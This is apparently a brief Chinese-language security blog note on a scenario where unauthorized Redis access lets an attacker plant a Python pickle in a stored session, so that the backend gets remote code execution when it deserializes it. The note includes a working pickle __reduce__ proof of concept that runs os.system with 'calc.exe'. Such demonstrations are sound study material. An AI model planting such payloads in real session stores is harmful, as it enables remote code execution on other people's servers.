今天无意看到的场景 redis未授权访问但被降权,redis用于存储用户session,后端python 序列化读取session
先来一张Pickle 序列化得样子
然后写进去 当访问session python会反序列化造成rce
这里写个测试例子
s为payload
import pickle
import os
class exp(object):
def __reduce__(self):
s = "calc.exe"
return (os.system,(s,))
e = exp()
s = pickle.dumps(e)
with open("rce","wb") as f:
f.write(s)
with open("rce","rb") as e:
data = pickle.loads(e.read())
print(data)
